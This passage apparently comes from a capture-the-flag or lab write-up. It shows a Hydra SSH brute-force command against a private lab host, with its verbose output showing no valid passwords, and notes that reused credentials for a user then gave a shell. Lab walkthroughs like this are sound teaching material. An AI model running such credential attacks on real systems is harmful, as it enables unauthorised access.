I tried bruteforcing but for some reason I was unable to get a valid response.
hydra -L /home/kali/Hunnit/results/users.txt -P /home/kali/Hunnit/results/passwords.txt -s 43022 -t 4 192.168.100.125 ssh -vv
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-07-3015:00:51[DATA] max4 tasks per 1 server, overall 4 tasks,25 login tries (l:5/p:5),~7 tries per task[DATA] attacking ssh://192.168.100.125:43022/[VERBOSE] Resolving addresses ... [VERBOSE] resolving done[INFO] Testing if password authentication is supported by ssh://rjackson@192.168.100.125:43022[INFO] Successful, password authentication is supported by ssh://192.168.100.125:43022[STATUS] attack finished for192.168.100.125 (waiting for children to complete tests)1 of 1 target completed,0 valid password foundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-07-3015:01:11
However when I tried the credentials for the user dademola with his corresponding password from earlier I managed to get a shell.